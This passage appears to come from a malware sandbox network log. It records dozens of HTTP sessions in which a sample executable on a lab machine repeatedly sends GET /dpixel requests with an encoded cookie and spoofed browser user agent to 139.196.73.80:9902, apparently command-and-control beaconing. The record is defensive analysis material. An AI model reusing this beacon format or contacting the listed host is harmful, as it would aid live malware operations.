Apr 17, 2024 07:08:19.097410917 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:19.415894985 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49804	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:19.835592985 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:20.155105114 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49805	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:20.588931084 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:21.267241001 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:21.589632034 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49806	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:22.034872055 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:22.363482952 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49807	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:22.795084000 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:23.130312920 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49808	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:23.562464952 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:24.251816034 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:24.583832026 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49809	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:26.116771936 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:26.448180914 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49810	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:27.039865971 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:27.390350103 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49811	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:27.843683958 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:28.548763990 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:28.892565012 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:28 GMT Content-Type: application/octet-stream Content-Length: 0
Apr 17, 2024 07:08:34.142010927 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49812	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:29.323446989 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:29.646600008 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49813	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:30.093612909 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:30.798619986 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:31.798664093 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:32.164465904 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:31 GMT Content-Type: application/octet-stream Content-Length: 0
Apr 17, 2024 07:08:33.280479908 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:31 GMT Content-Type: application/octet-stream Content-Length: 0
Apr 17, 2024 07:08:35.512799025 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:31 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49814	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:32.596761942 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:33.282929897 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:34.267338037 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:36.204811096 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:36.557755947 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:36 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49815	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:36.990442991 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:37.307681084 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49816	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:37.758291960 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:38.091202021 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:37 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49817	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:38.522274971 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:38.840642929 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:38 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49818	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:39.268362999 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:39.582314014 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:39 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49819	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:40.039388895 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:40.369910955 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49820	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:40.813321114 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:41.143122911 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:40 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49821	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:41.574521065 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:41.909491062 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:41 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49822	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:42.377137899 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:42.726860046 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:42 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49823	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:44.290832043 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:44.640758991 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:44 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49824	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:45.072850943 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:45.395587921 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:45 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49825	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:48.830288887 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:49.162866116 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49826	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 07:08:49.584428072 CEST	377	OUT	GET /dpixel HTTP/1.1 Accept: / Cookie: ax84CWs/8I2eQtfztl4OjfNBOAWUtjBruxvpFzPYcBu1sBhg73gHCOXnpd6y07bR9RyD5AHAVqeXv9W3+p7Ko/njUNMA+GoEzNnZoWDlWTDCUf8W9MmVrihn2DNVPLnICZe20/2wCdAe7vN1DzIv6LPFr+S18NZvQ8s2aITzqjI= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; MANM) Host: 139.196.73.80:9902 Connection: Keep-Alive Cache-Control: no-cache
Apr 17, 2024 07:08:49.904066086 CEST	115	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 05:08:49 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49827	139.196.73.80	9902	6160	C:\Users\user\Desktop\7xRIr23y7v.exe

Timestamp	Bytes transferred	Direction	Data
